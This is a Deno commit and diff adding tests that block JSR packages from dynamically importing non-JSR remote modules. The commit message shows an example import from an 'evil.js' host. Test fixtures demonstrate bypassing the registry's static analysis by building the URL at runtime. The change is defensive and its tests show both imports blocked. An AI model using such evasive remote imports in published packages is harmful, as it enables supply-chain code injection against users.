fix(jsr): do not allow importing a non-JSR url via unanalyzable dynamic import from JSR (#22623)

A security feature of JSR is that it is self contained other than npm
dependencies. At publish time, the registry rejects packages that write
code like this:

```ts
const data = await import("https://example.com/evil.js");
```

However, this can be trivially bypassed by writing code that the
registry cannot statically analyze for. This PR prevents Deno from
loading dynamic imports that do this.

9 files changed, 50 insertions, 0 deletions

diff --git a/tests/integration/jsr_tests.rs b/tests/integration/jsr_tests.rs
index fa8a9d8b9..25a0c8663 100644
--- a/tests/integration/jsr_tests.rs
+++ b/tests/integration/jsr_tests.rs
@@ -60,6 +60,22 @@ itest!(deps_info {
   http_server: true,
 });
 
+itest!(import_https_url_analyzable {
+  args: "run -A jsr/import_https_url/analyzable.ts",
+  output: "jsr/import_https_url/analyzable.out",
+  envs: env_vars_for_jsr_tests(),
+  http_server: true,
+  exit_code: 1,
+});
+
+itest!(import_https_url_unanalyzable {
+  args: "run -A jsr/import_https_url/unanalyzable.ts",
+  output: "jsr/import_https_url/unanalyzable.out",
+  envs: env_vars_for_jsr_tests(),
+  http_server: true,
+  exit_code: 1,
+});
+
 itest!(subset_type_graph {
   args: "check --all jsr/subset_type_graph/main.ts",
   output: "jsr/subset_type_graph/main.check.out",
diff --git a/tests/testdata/jsr/import_https_url/analyzable.out b/tests/testdata/jsr/import_https_url/analyzable.out
new file mode 100644
index 000000000..dd1ca58b4
--- /dev/null
+++ b/tests/testdata/jsr/import_https_url/analyzable.out
@@ -0,0 +1,8 @@
+Download http://127.0.0.1:4250/@denotest/import-https-url/meta.json
+Download http://127.0.0.1:4250/@denotest/import-https-url/1.0.0_meta.json
+Download http://127.0.0.1:4250/@denotest/import-https-url/1.0.0/analyzable.ts
+Download http://localhost:4545/welcome.ts
+error: Uncaught (in promise) TypeError: Importing http://localhost:4545/welcome.ts blocked. JSR packages cannot import non-JSR remote modules for security reasons.
+await import("http://localhost:4545/welcome.ts");
+^
+    at async http://127.0.0.1:4250/@denotest/import-https-url/1.0.0/analyzable.ts:1:1
diff --git a/tests/testdata/jsr/import_https_url/analyzable.ts b/tests/testdata/jsr/import_https_url/analyzable.ts
new file mode 100644
index 000000000..44382867f
--- /dev/null
+++ b/tests/testdata/jsr/import_https_url/analyzable.ts
@@ -0,0 +1 @@
+import "jsr:@denotest/import-https-url/analyzable";
diff --git a/tests/testdata/jsr/import_https_url/unanalyzable.out b/tests/testdata/jsr/import_https_url/unanalyzable.out
new file mode 100644
index 000000000..4ae04996c
--- /dev/null
+++ b/tests/testdata/jsr/import_https_url/unanalyzable.out
@@ -0,0 +1,7 @@
+Download http://127.0.0.1:4250/@denotest/import-https-url/meta.json
+Download http://127.0.0.1:4250/@denotest/import-https-url/1.0.0_meta.json
+Download http://127.0.0.1:4250/@denotest/import-https-url/1.0.0/unanalyzable.ts
+error: Uncaught (in promise) TypeError: Importing http://localhost:4545/welcome.ts blocked. JSR packages cannot import non-JSR remote modules for security reasons.
+await import(nonAnalyzableUrl());
+^
+    at async http://127.0.0.1:4250/@denotest/import-https-url/1.0.0/unanalyzable.ts:5:1
diff --git a/tests/testdata/jsr/import_https_url/unanalyzable.ts b/tests/testdata/jsr/import_https_url/unanalyzable.ts
new file mode 100644
index 000000000..87ccdcfdc
--- /dev/null
+++ b/tests/testdata/jsr/import_https_url/unanalyzable.ts
@@ -0,0 +1 @@
+import "jsr:@denotest/import-https-url/unanalyzable";
diff --git a/tests/testdata/jsr/registry/@denotest/import-https-url/1.0.0/analyzable.ts b/tests/testdata/jsr/registry/@denotest/import-https-url/1.0.0/analyzable.ts
new file mode 100644
index 000000000..b1b64d82f
--- /dev/null
+++ b/tests/testdata/jsr/registry/@denotest/import-https-url/1.0.0/analyzable.ts
@@ -0,0 +1 @@
+await import("http://localhost:4545/welcome.ts");
diff --git a/tests/testdata/jsr/registry/@denotest/import-https-url/1.0.0/unanalyzable.ts b/tests/testdata/jsr/registry/@denotest/import-https-url/1.0.0/unanalyzable.ts
new file mode 100644
index 000000000..63001d15f
--- /dev/null
+++ b/tests/testdata/jsr/registry/@denotest/import-https-url/1.0.0/unanalyzable.ts
@@ -0,0 +1,5 @@
+function nonAnalyzableUrl() {
+  return "http://localhost:4545/" + "welcome.ts";
+}
+
+await import(nonAnalyzableUrl());
diff --git a/tests/testdata/jsr/registry/@denotest/import-https-url/1.0.0_meta.json b/tests/testdata/jsr/registry/@denotest/import-https-url/1.0.0_meta.json
new file mode 100644
index 000000000..23b877080
--- /dev/null
+++ b/tests/testdata/jsr/registry/@denotest/import-https-url/1.0.0_meta.json
@@ -0,0 +1,6 @@
+{
+  "exports": {
+    "./unanalyzable": "./unanalyzable.ts",
+    "./analyzable": "./analyzable.ts"
+  }
+}
diff --git a/tests/testdata/jsr/registry/@denotest/import-https-url/meta.json b/tests/testdata/jsr/registry/@denotest/import-https-url/meta.json
new file mode 100644
index 000000000..02601e4d0
--- /dev/null
+++ b/tests/testdata/jsr/registry/@denotest/import-https-url/meta.json
@@ -0,0 +1,5 @@
+{
+  "versions": {
+    "1.0.0": {}
+  }
+}